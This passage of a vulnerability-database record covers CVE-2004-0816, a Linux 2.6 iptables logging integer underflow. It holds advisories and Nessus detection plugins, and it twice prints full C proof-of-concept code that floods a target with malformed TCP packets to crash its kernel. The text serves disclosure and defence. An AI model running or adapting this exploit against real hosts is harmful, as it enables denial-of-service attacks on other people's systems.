vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch.\r\n\r\nA remote attacker may exploit this vulnerability to crash a computer that is running the affected kernel.\r\n\r\nThe 2.6 Linux kernel is reported prone to this vulnerability, the 2.4 kernel is not reported to be vulnerable.\r\n\r\n/* \r\n* \r\n* iptables.log.integer.underflow.POC.c \r\n* \r\n* (CAN-2004-0816, BID11488, SUSE-SA:2004:037)\r\n*\r\n* felix__zhou _at_ hotmail _dot_ com\r\n*\r\n* */\r\n\r\n#include <stdio.h>\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#include <time.h>\r\n\r\n#pragma comment(lib,"ws2_32")\r\n\r\nstatic unsigned char dip[4];\r\nstatic unsigned int da;\r\nstatic unsigned short dp;\r\nstatic unsigned char dport[2];\r\n\r\nstatic unsigned char sip[4];\r\nstatic unsigned int sa;\r\nstatic unsigned short sp;\r\nstatic unsigned char sport[2];\r\n\r\n/*\r\nstatic void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)\r\n{\r\nunsigned int csum = 0;\r\nunsigned char *p = ip;\r\n\r\nwhile (1 < size) {\r\ncsum += (p[0] << 8) + p[1];\r\np += 2;\r\nsize -= 2;\r\n}\r\n\r\nif (size) \r\ncsum += *p;\r\n\r\ncsum = (csum >> 16) + (csum & 0xffff);\r\ncsum += (csum >> 16);\r\n\r\nsum[0] = (((unsigned short)(~csum)) >> 8);\r\nsum[1] = ((((unsigned short)(~csum)) << 8) >> 8);\r\n}\r\n*/\r\n\r\nstatic void tcp_csum(unsigned char *tcp, unsigned char *ip, \r\nunsigned int size, unsigned char *sum)\r\n{\r\nunsigned int csum = 0;\r\nunsigned char *p = tcp;\r\n\r\nwhile (1 < size) {\r\ncsum += (p[0] << 8) + p[1];\r\np += 2;\r\nsize -= 2;\r\n}\r\n\r\ncsum += (ip[12] << 8) + ip[13];\r\ncsum += (ip[14] << 8) + ip[15];\r\n\r\ncsum += (ip[16] << 8) + ip[17];\r\ncsum += (ip[18] << 8) + ip[19];\r\n\r\ncsum += 0x06;\r\ncsum += 0x14;\r\n\r\nif (size) \r\ncsum += *p;\r\n\r\ncsum = (csum >> 16) + (csum & 0xffff);\r\ncsum += (csum >> 16);\r\n\r\nsum[0] = (((unsigned short)(~csum)) >> 8);\r\nsum[1] = ((((unsigned short)(~csum)) << 8) >> 8);\r\n}\r\n\r\nstatic int work(SOCKET s)\r\n{\r\nDWORD ret = 1;\r\nunsigned char buf[1500];\r\nunsigned char *ip;\r\nunsigned char *tcp;\r\nunsigned int seq = 0x01;\r\nstruct sockaddr_in host;\r\n\r\nZeroMemory(buf, 1500);\r\n\r\nip = buf;\r\ntcp = buf + 20;\r\n\r\nip[0] = 0x45; /* ver & hlen */\r\nip[3] = 0x28; /* tlen */\r\nip[8] = 0x80; /* ttl */\r\nip[9] = 0x06; /* protocol */\r\nip[10] = ip[11] = 0;\r\nip[12] = sip[0]; /* saddr */\r\nip[13] = sip[1];\r\nip[14] = sip[2];\r\nip[15] = sip[3];\r\nip[16] = dip[0]; /* daddr */\r\nip[17] = dip[1];\r\nip[18] = dip[2];\r\nip[19] = dip[3];\r\n\r\ntcp[0] = sport[0];\r\ntcp[1] = sport[1];\r\ntcp[2] = dport[0]; /* dport */\r\ntcp[3] = dport[1];\r\ntcp[12] = 0x40; /* hlen */ /* HERE */\r\ntcp[13] = 0x02; /* flags */\r\n\r\nZeroMemory(&host, sizeof(struct sockaddr_in));\r\nhost.sin_family = AF_INET;\r\nhost.sin_port = dp;\r\nhost.sin_addr.s_addr = da;\r\n\r\nfor (;; ) {\r\ntcp[4] = (seq >> 24); /* seq number */\r\ntcp[5] = ((seq << 8) >> 24);\r\ntcp[6] = ((seq << 16) >> 24);\r\ntcp[7] = ((seq << 24) >> 24);\r\ntcp[16] = tcp[17] = 0;\r\nseq ++;\r\n\r\ntcp_csum(tcp, ip, 0x14, tcp + 16);\r\n\r\nif (SOCKET_ERROR == sendto(s, buf, 0x28, 0, \r\n(SOCKADDR *)&(host), sizeof host)) {\r\nif (WSAEACCES != WSAGetLastError()) {\r\nprintf("sendto() failed: %d\\n", \r\nWSAGetLastError());\r\n\r\nret = 1;\r\n} else {\r\nprintf("You must be Administrator!\\n");\r\n}\r\n\r\nbreak;\r\n}\r\n}\r\n\r\nreturn ret;\r\n}\r\n\r\nstatic char usage[] = "Usage: %s dip dport sip sport\\n";\r\n\r\nint main(int argc, char **argv)\r\n{\r\nWORD ver = MAKEWORD(2, 2);\r\nWSADATA data;\r\nunsigned char *p;\r\nSOCKET s;\r\nint ret = 1;\r\nBOOL eopt = TRUE;\r\n\r\nif (5 != argc) {\r\nprintf(usage, argv[0]);\r\ngoto out;\r\n}\r\n\r\nif (INADDR_NONE == (da = inet_addr(argv[1]))) {\r\nprintf("dest ip address is NOT valid!\\n");\r\nprintf(usage, argv[0]);\r\ngoto out;\r\n}\r\n\r\np = (unsigned char *)&da;\r\ndip[0] = p[0];\r\ndip[1] = p[1];\r\ndip[2] = p[2];\r\ndip[3] = p[3];\r\n\r\ndp = atoi(argv[2]);\r\ndport[0] = ((dp << 16) >> 24);\r\ndport[1] = ((dp << 24) >> 24);\r\n\r\nif (INADDR_NONE == (sa = inet_addr(argv[3]))) {\r\nprintf("source ip address is NOT valid!\\n");\r\nprintf(usage, argv[3]);\r\ngoto out;\r\n}\r\n\r\np = (unsigned char *)&sa;\r\nsip[0] = p[0];\r\nsip[1] = p[1];\r\nsip[2] = p[2];\r\nsip[3] = p[3];\r\n\r\nsp = atoi(argv[4]);\r\nsport[0] = ((sp << 16) >> 24);\r\nsport[1] = ((sp << 24) >> 24);\r\n\r\nsrand((unsigned int)time(0));\r\n\r\nif (WSAStartup(ver, &data)) {\r\nprintf("WSAStartup() failed\\n");\r\ngoto out;\r\n}\r\n\r\nif (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0))) \r\ngoto err;\r\n\r\nif (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL, \r\n(char *)&eopt, sizeof(eopt)))\r\ngoto err1;\r\n\r\nwork(s);\r\n\r\nerr1:\r\nclosesocket(s);\r\nerr:\r\nWSACleanup();\r\n\r\nout:\r\nreturn ret;\r\n}\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78390", "status": "cve,poc"}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote underflow exists in Linux Kernel. The Linux Kernel fails to properly parse input from the iptables firewall logging rules resulting in a integer underflow. With a specially crafted request, an attacker can cause a denial of service resulting in a loss of availability for the system.\n## Solution Description\nUpgrade to version 2.6.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote underflow exists in Linux Kernel. The Linux Kernel fails to properly parse input from the iptables firewall logging rules resulting in a integer underflow. With a specially crafted request, an attacker can cause a denial of service resulting in a loss of availability for the system.\n## References:\nVendor URL: http://www.kernel.org/\nSecurity Tracker: 1011854\n[Secunia Advisory ID:11202](https://secuniaresearch.flexerasoftware.com/advisories/11202/)\n[Secunia Advisory ID:12904](https://secuniaresearch.flexerasoftware.com/advisories/12904/)\n[Secunia Advisory ID:13061](https://secuniaresearch.flexerasoftware.com/advisories/13061/)\n[Secunia Advisory ID:14002](https://secuniaresearch.flexerasoftware.com/advisories/14002/)\n[Related OSVDB ID: 11015](https://vulners.com/osvdb/OSVDB:11015)\n[Related OSVDB ID: 11016](https://vulners.com/osvdb/OSVDB:11016)\nOther Advisory URL: http://www.suse.de/de/security/2004_37_kernel.html\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2005:022\nKeyword: SUSE-SA:2004:037\nISS X-Force ID: 17800\n[CVE-2004-0816](https://vulners.com/cve/CVE-2004-0816)\n", "reporter": "Richard Hart()", "published": "2004-10-21T05:55:30", "title": "Linux Kernel iptables Logging Rules Integer Underflow DoS", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Linux Kernel", "version": "2.6.4", "operator": "eq"}, {"name": "Linux Kernel", "version": "2.6.5", "operator": "eq"}, {"name": "Linux Kernel", "version": "2.6.7", "operator": "eq"}, {"name": "Linux Kernel", "version": "2.6.0", "operator": "eq"}, {"name": "Linux Kernel", "version": "2.6.3", "operator": "eq"}, {"name": "Linux Kernel", "version": "2.6.1", "operator": "eq"}, {"name": "Linux Kernel", "version": "2.6.2", "operator": "eq"}, {"name": "Linux Kernel", "version": "2.6.6", "operator": "eq"}], "cvelist": ["CVE-2004-0816"], "modified": "2004-10-21T05:55:30", "href": "https://vulners.com/osvdb/OSVDB:11014", "id": "OSVDB:11014", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T23:49:56", "osvdbidlist": ["11014"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Linux Kernel 2.6.x IPTables Logging Rules Integer Underflow Vulnerability. CVE-2004-0816. Remote exploit for linux platform", "reporter": "Richard Hart", "published": "2004-11-21T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0816"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2004-11-21T00:00:00", "id": "EDB-ID:24696", "href": "https://www.exploit-db.com/exploits/24696/", "sourceData": "source: http://www.securityfocus.com/bid/11488/info\r\n\r\nIt is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch.\r\n\r\nA remote attacker may exploit this vulnerability to crash a computer that is running the affected kernel.\r\n\r\nThe 2.6 Linux kernel is reported prone to this vulnerability, the 2.4 kernel is not reported to be vulnerable.\r\n\r\n/* \r\n* \r\n* iptables.log.integer.underflow.POC.c \r\n* \r\n* (CAN-2004-0816, BID11488, SUSE-SA:2004:037)\r\n*\r\n* felix__zhou _at_ hotmail _dot_ com\r\n*\r\n* */\r\n\r\n#include <stdio.h>\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#include <time.h>\r\n\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nstatic unsigned char dip[4];\r\nstatic unsigned int da;\r\nstatic unsigned short dp;\r\nstatic unsigned char dport[2];\r\n\r\nstatic unsigned char sip[4];\r\nstatic unsigned int sa;\r\nstatic unsigned short sp;\r\nstatic unsigned char sport[2];\r\n\r\n/*\r\nstatic void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)\r\n{\r\nunsigned int csum = 0;\r\nunsigned char *p = ip;\r\n\r\nwhile (1 < size) {\r\ncsum += (p[0] << 8) + p[1];\r\np += 2;\r\nsize -= 2;\r\n}\r\n\r\nif (size) \r\ncsum += *p;\r\n\r\ncsum = (csum >> 16) + (csum & 0xffff);\r\ncsum += (csum >> 16);\r\n\r\nsum[0] = (((unsigned short)(~csum)) >> 8);\r\nsum[1] = ((((unsigned short)(~csum)) << 8) >> 8);\r\n}\r\n*/\r\n\r\nstatic void tcp_csum(unsigned char *tcp, unsigned char *ip, \r\nunsigned int size, unsigned char *sum)\r\n{\r\nunsigned int csum = 0;\r\nunsigned char *p = tcp;\r\n\r\nwhile (1 < size) {\r\ncsum += (p[0] << 8) + p[1];\r\np += 2;\r\nsize -= 2;\r\n}\r\n\r\ncsum += (ip[12] << 8) + ip[13];\r\ncsum += (ip[14] << 8) + ip[15];\r\n\r\ncsum += (ip[16] << 8) + ip[17];\r\ncsum += (ip[18] << 8) + ip[19];\r\n\r\ncsum += 0x06;\r\ncsum += 0x14;\r\n\r\nif (size) \r\ncsum += *p;\r\n\r\ncsum = (csum >> 16) + (csum & 0xffff);\r\ncsum += (csum >> 16);\r\n\r\nsum[0] = (((unsigned short)(~csum)) >> 8);\r\nsum[1] = ((((unsigned short)(~csum)) << 8) >> 8);\r\n}\r\n\r\nstatic int work(SOCKET s)\r\n{\r\nDWORD ret = 1;\r\nunsigned char buf[1500];\r\nunsigned char *ip;\r\nunsigned char *tcp;\r\nunsigned int seq = 0x01;\r\nstruct sockaddr_in host;\r\n\r\nZeroMemory(buf, 1500);\r\n\r\nip = buf;\r\ntcp = buf + 20;\r\n\r\nip[0] = 0x45; /* ver & hlen */\r\nip[3] = 0x28; /* tlen */\r\nip[8] = 0x80; /* ttl */\r\nip[9] = 0x06; /* protocol */\r\nip[10] = ip[11] = 0;\r\nip[12] = sip[0]; /* saddr */\r\nip[13] = sip[1];\r\nip[14] = sip[2];\r\nip[15] = sip[3];\r\nip[16] = dip[0]; /* daddr */\r\nip[17] = dip[1];\r\nip[18] = dip[2];\r\nip[19] = dip[3];\r\n\r\ntcp[0] = sport[0];\r\ntcp[1] = sport[1];\r\ntcp[2] = dport[0]; /* dport */\r\ntcp[3] = dport[1];\r\ntcp[12] = 0x40; /* hlen */ /* HERE */\r\ntcp[13] = 0x02; /* flags */\r\n\r\nZeroMemory(&host, sizeof(struct sockaddr_in));\r\nhost.sin_family = AF_INET;\r\nhost.sin_port = dp;\r\nhost.sin_addr.s_addr = da;\r\n\r\nfor (;; ) {\r\ntcp[4] = (seq >> 24); /* seq number */\r\ntcp[5] = ((seq << 8) >> 24);\r\ntcp[6] = ((seq << 16) >> 24);\r\ntcp[7] = ((seq << 24) >> 24);\r\ntcp[16] = tcp[17] = 0;\r\nseq ++;\r\n\r\ntcp_csum(tcp, ip, 0x14, tcp + 16);\r\n\r\nif (SOCKET_ERROR == sendto(s, buf, 0x28, 0, \r\n(SOCKADDR *)&(host), sizeof host)) {\r\nif (WSAEACCES != WSAGetLastError()) {\r\nprintf(\"sendto() failed: %d\\n\", \r\nWSAGetLastError());\r\n\r\nret = 1;\r\n} else {\r\nprintf(\"You must be Administrator!\\n\");\r\n}\r\n\r\nbreak;\r\n}\r\n}\r\n\r\nreturn ret;\r\n}\r\n\r\nstatic char usage[] = \"Usage: %s dip dport sip sport\\n\";\r\n\r\nint main(int argc, char **argv)\r\n{\r\nWORD ver = MAKEWORD(2, 2);\r\nWSADATA data;\r\nunsigned char *p;\r\nSOCKET s;\r\nint ret = 1;\r\nBOOL eopt = TRUE;\r\n\r\nif (5 != argc) {\r\nprintf(usage, argv[0]);\r\ngoto out;\r\n}\r\n\r\nif (INADDR_NONE == (da = inet_addr(argv[1]))) {\r\nprintf(\"dest ip address is NOT valid!\\n\");\r\nprintf(usage, argv[0]);\r\ngoto out;\r\n}\r\n\r\np = (unsigned char *)&da;\r\ndip[0] = p[0];\r\ndip[1] = p[1];\r\ndip[2] = p[2];\r\ndip[3] = p[3];\r\n\r\ndp = atoi(argv[2]);\r\ndport[0] = ((dp << 16) >> 24);\r\ndport[1] = ((dp << 24) >> 24);\r\n\r\nif (INADDR_NONE == (sa = inet_addr(argv[3]))) {\r\nprintf(\"source ip address is NOT valid!\\n\");\r\nprintf(usage, argv[3]);\r\ngoto out;\r\n}\r\n\r\np = (unsigned char *)&sa;\r\nsip[0] = p[0];\r\nsip[1] = p[1];\r\nsip[2] = p[2];\r\nsip[3] = p[3];\r\n\r\nsp = atoi(argv[4]);\r\nsport[0] = ((sp << 16) >> 24);\r\nsport[1] = ((sp << 24) >> 24);\r\n\r\nsrand((unsigned int)time(0));\r\n\r\nif (WSAStartup(ver, &data)) {\r\nprintf(\"WSAStartup() failed\\n\");\r\ngoto out;\r\n}\r\n\r\nif (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0))) \r\ngoto err;\r\n\r\nif (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL, \r\n(char *)&eopt, sizeof(eopt)))\r\ngoto err1;\r\n\r\nwork(s);\r\n\r\nerr1:\r\nclosesocket(s);\r\nerr:\r\nWSACleanup();\r\n\r\nout:\r\nreturn ret;\r\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24696/"}], "nessus": [{"lastseen": "2019-01-16T20:05:46", "references": [], "pluginID": "15528", "description": "The remote host is missing the patch for the advisory SUSE-SA:2004:037 (kernel).\n\n\nAn integer underflow problem in the iptables firewall logging rules\ncan allow a remote attacker to crash the machine by using a handcrafted\nIP packet. This attack is only possible with firewalling enabled.\n\nWe would like to thank Richard Hart for reporting the problem.\n\nThis problem has already been fixed in the 2.6.8 upstream Linux kernel,\nthis update contains a backport of the fix.\n\nProducts running a 2.4 kernel are not affected.\n\nMitre has assigned the CVE ID CVE-2004-0816 for this problem.\n\n\nAdditionaly Martin Schwidefsky of IBM found an incorrectly handled\nprivileged instruction which can lead to a local user gaining\nroot user privileges.\n\nThis only affects the SUSE Linux Enterprise Server 9 on the S/390\nplatform and has been assigned CVE ID CVE-2004-0887.\n\n\nAdditionaly the following non-security bugs were fixed:\n\n- Two CD burning problems.\n\n- USB 2.0 stability problems under high load on SMP systems.\n\n- Several SUSE Linux Enterprise Server issues.\n(see the Maintenance Information Mail for more informations).", "edition": 4, "reporter": "Tenable", "published": "2004-10-21T00:00:00", "title": "SUSE-SA:2004:037: kernel", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0887", "CVE-2004-0816"], "modified": "2010-10-06T00:00:00", "cpe": [], "id": "SUSE_SA_2004_037.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15528", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2004:037\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(15528);\n script_version (\"$Revision: 1.9 $\");\n script_bugtraq_id(11488, 11489);\n script_cve_id(\"CVE-2004-0816\", \"CVE-2004-0887\");\n \n name[\"english\"] = \"SUSE-SA:2004:037: kernel\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2004:037 (kernel).\n\n\nAn integer underflow problem in the iptables firewall logging rules\ncan allow a remote attacker to crash the machine by using a handcrafted\nIP packet. This attack is only possible with firewalling enabled.\n\nWe would like to thank Richard Hart for reporting the problem.\n\nThis problem has already been fixed in the 2.6.8 upstream Linux kernel,\nthis update contains a backport of the fix.\n\nProducts running a 2.4 kernel are not affected.\n\nMitre has assigned the CVE ID CVE-2004-0816 for this problem.\n\n\nAdditionaly Martin Schwidefsky of IBM found an incorrectly handled\nprivileged instruction which can lead to a local user gaining\nroot user privileges.\n\nThis only affects the SUSE Linux Enterprise Server 9 on the S/390\nplatform and has been assigned CVE ID CVE-2004-0887.\n\n\nAdditionaly the following non-security bugs were fixed:\n\n- Two CD burning problems.\n\n- USB 2.0 stability problems under high load on SMP systems.\n\n- Several SUSE Linux Enterprise Server issues.\n(see the Maintenance Information Mail for more informations).\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2004_37_kernel.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/10/21\");\n script_cvs_date(\"$Date: 2010/10/06 02:47:45 $\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the kernel package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"kernel-default-2.6.5-7.111\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-smp-2.6.5-7.111\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-bigsmp-2.6.5-7.111\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"kernel-\", release:\"SUSE9.1\") )\n{\n set_kb_item(name:\"CVE-2004-0816\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0887\", value:TRUE);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:05:53", "references": ["http://www.isec.pl/vulnerabilities/isec-0022-pagefault.txt", "http://www.ussg.iu.edu/hypermail/linux/kernel/0411.1/1222.html", "https://isec.pl/en/vulnerabilities/isec-0017-binfmt_elf.txt"], "pluginID": "16259", "description": "A number of vulnerabilities are fixed in the 2.4 and 2.6 kernels with\nthis advisory :\n\n - Multiple race conditions in the terminal layer of 2.4\n and 2.6 kernels (prior to 2.6.9) can allow a local\n attacker to obtain portions of kernel data or allow\n remote attackers to cause a kernel panic by switching\n from console to PPP line discipline, then quickly\n sending data that is received during the switch\n (CVE-2004-0814)\n\n - Richard Hart found an integer underflow problem in the\n iptables firewall logging rules that can allow a remote\n attacker to crash the machine by using a specially\n crafted IP packet. This is only possible, however, if\n firewalling is enabled. The problem only affects 2.6\n kernels and was fixed upstream in 2.6.8 (CVE-2004-0816)\n\n - Stefan Esser found several remote DoS confitions in the\n smbfs file system. This could be exploited by a hostile\n SMB server (or an attacker injecting packets into the\n network) to crash the client systems (CVE-2004-0883 and\n CVE-2004-0949)\n\n - Paul Starzetz and Georgi Guninski reported,\n independently, that bad argument handling and bad\n integer arithmetics in the IPv4 sendmsg handling of\n control messages could lead to a local attacker crashing\n the machine. The fixes were done by Herbert Xu\n (CVE-2004-1016)\n\n - Rob Landley discovered a race condition in the handling\n of /proc/.../cmdline where, under rare circumstances, a\n user could read the environment variables of another\n process that was still spawning leading to the potential\n disclosure of sensitive information such as passwords\n (CVE-2004-1058)\n\n - Paul Starzetz reported that the missing serialization in\n unix_dgram_recvmsg() which was added to kernel 2.4.28\n can be used by a local attacker to gain elevated (root)\n privileges (CVE-2004-1068)\n\n - Ross Kendall Axe discovered a possible kernel panic\n (DoS) while sending AF_UNIX network packets if certain\n SELinux-related kernel options were enabled. By default\n the CONFIG_SECURITY_NETWORK and CONFIG_SECURITY_SELINUX\n options are not enabled (CVE-2004-1069)\n\n - Paul Starzetz of isec.pl discovered several issues with\n the error handling of the ELF loader routines in the\n kernel. The fixes were provided by Chris Wright\n (CVE-2004-1070, CVE-2004-1071, CVE-2004-1072,\n CVE-2004-1073)\n\n - It was discovered that hand-crafted a.out binaries could\n be used to trigger a local DoS condition in both the 2.4\n and 2.6 kernels. The fixes were done by Chris Wright\n (CVE-2004-1074)\n\n - Paul Starzetz found bad handling in the IGMP code which\n could lead to a local attacker being able to crash the\n machine. The fix was done by Chris Wright\n (CVE-2004-1137)\n\n - Jeremy Fitzhardinge discovered two buffer overflows in\n the sys32_ni_syscall() and sys32_vm86_warning()\n functions that could be used to overwrite kernel memory\n with attacker-supplied code resulting in privilege\n escalation (CVE-2004-1151)\n\n - Paul Starzetz found locally exploitable flaws in the\n binary format loader's uselib() function that could be\n abused to allow a local user to obtain root privileges\n (CVE-2004-1235)\n\n - Paul Starzetz found an exploitable flaw in the page\n fault handler when running on SMP machines\n (CVE-2005-0001)\n\n - A vulnerability in insert_vm_struct could allow a locla\n user to trigger BUG() when the user created a large vma\n that overlapped with arg pages during exec\n (CVE-2005-0003)\n\n - Paul Starzetz also found a number of vulnerabilities in\n the kernel binfmt_elf loader that could lead a local\n user to obtain elevated (root) privileges\n (isec-0017-binfmt_elf)\n\nThe provided packages are patched to fix these vulnerabilities. All\nusers are encouraged to upgrade to these updated kernels.\n\nTo update your kernel, please follow the directions located at :\n\nhttp://www.mandrakesoft.com/security/kernelupdate\n\nPLEASE NOTE: Mandrakelinux 10.0 users will need to upgrade to the\nlatest module-init-tools package prior to upgrading their kernel.\nLikewise, MNF8.2 users will need to upgrade to the latest modutils\npackage prior to upgrading their kernel.", "edition": 7, "reporter": "Tenable", "published": "2005-01-26T00:00:00", "title": "Mandrake Linux Security Advisory : kernel (MDKSA-2005:022)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1058", "CVE-2004-1235", "CVE-2005-0003", "CVE-2004-1069", "CVE-2004-1071", "CVE-2004-1072", "CVE-2004-1191", "CVE-2004-0883", "CVE-2004-1057", "CVE-2004-1070", "CVE-2004-0816", "CVE-2004-0949", "CVE-2004-1151", "CVE-2004-1137", "CVE-2004-1068", "CVE-2004-1074", "CVE-2004-0814", "CVE-2005-0001", "CVE-2004-1073", "CVE-2004-1016"], "modified": "2018-11-15T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:kernel-enterprise-2.6.8.1.24mdk", "p-cpe:/a:mandriva:linux:kernel-2.6.8.1.24mdk", "p-cpe:/a:mandriva:linux:module-init-tools", "p-cpe:/a:mandriva:linux:kernel-p3-smp-64GB-2.4.22.41mdk", "p-cpe:/a:mandriva:linux:kernel-smp-2.4.25.13mdk", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "p-cpe:/a:mandriva:linux:kernel-i686-up-4GB-2.6.3.25mdk", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:kernel-enterprise-2.6.3.25mdk", "p-cpe:/a:mandriva:linux:kernel-2.4.28.0.rc1.5mdk", "p-cpe:/a:mandriva:linux:kernel-i686-up-64GB-2.6.8.1.24mdk", "p-cpe:/a:mandriva:linux:kernel-source-2.6", "p-cpe:/a:mandriva:linux:kernel-p3-smp-64GB-2.4.25.13mdk", "p-cpe:/a:mandriva:linux:kernel-source-stripped", "p-cpe:/a:mandriva:linux:kernel-secure-2.4.22.41mdk", "p-cpe:/a:mandriva:linux:kernel-source-stripped-2.6", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:kernel-smp-2.4.22.41mdk", "p-cpe:/a:mandriva:linux:kernel-2.4.25.13mdk", "p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.25.13mdk", "p-cpe:/a:mandriva:linux:kernel-source", "p-cpe:/a:mandriva:linux:kernel-smp-2.4.28.0.rc1.5mdk", "p-cpe:/a:mandriva:linux:kernel-secure-2.6.8.1.24mdk", "p-cpe:/a:mandriva:linux:kernel-i586-up-1GB-2.6.8.1.24mdk", "p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.28.0.rc1.5mdk", "p-cpe:/a:mandriva:linux:kernel-p3-smp-64GB-2.6.3.25mdk", "p-cpe:/a:mandriva:linux:kernel-2.6.3.25mdk", "p-cpe:/a:mandriva:linux:kernel-i686-up-4GB-2.4.25.13mdk", "p-cpe:/a:mandriva:linux:kernel-i586-up-1GB-2.4.28.0.rc1.5mdk", "p-cpe:/a:mandriva:linux:kernel-smp-2.6.3.25mdk", "p-cpe:/a:mandriva:linux:kernel-enterprise-2.4.22.41mdk", "p-cpe:/a:mandriva:linux:kernel-secure-2.6.3.25mdk", "p-cpe:/a:mandriva:linux:kernel-source-2.4", "p-cpe:/a:mandriva:linux:kernel-i686-up-4GB-2.4.22.41mdk", "p-cpe:/a:mandriva:linux:kernel-smp-2.6.8.1.24mdk", "p-cpe:/a:mandriva:linux:kernel-2.4.22.41mdk"], "id": "MANDRAKE_MDKSA-2005-022.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16259", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:022. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16259);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2004-0814\", \"CVE-2004-0816\", \"CVE-2004-0883\", \"CVE-2004-0949\", \"CVE-2004-1016\", \"CVE-2004-1057\", \"CVE-2004-1058\", \"CVE-2004-1068\", \"CVE-2004-1069\", \"CVE-2004-1070\", \"CVE-2004-1071\", \"CVE-2004-1072\", \"CVE-2004-1073\", \"CVE-2004-1074\", \"CVE-2004-1137\", \"CVE-2004-1151\", \"CVE-2004-1191\", \"CVE-2004-1235\", \"CVE-2005-0001\", \"CVE-2005-0003\");\n script_xref(name:\"MDKSA\", value:\"2005:022\");\n\n script_name(english:\"Mandrake Linux Security Advisory : kernel (MDKSA-2005:022)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake 